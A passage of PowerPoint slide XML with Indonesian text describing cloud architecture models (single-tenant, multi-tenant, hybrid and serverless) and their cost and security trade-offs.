              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mahal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> multi-tenant, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> multi-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>penyewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> masing-masing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipisahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain. Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hemat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebocoran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>hibrida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cermat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menurunkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
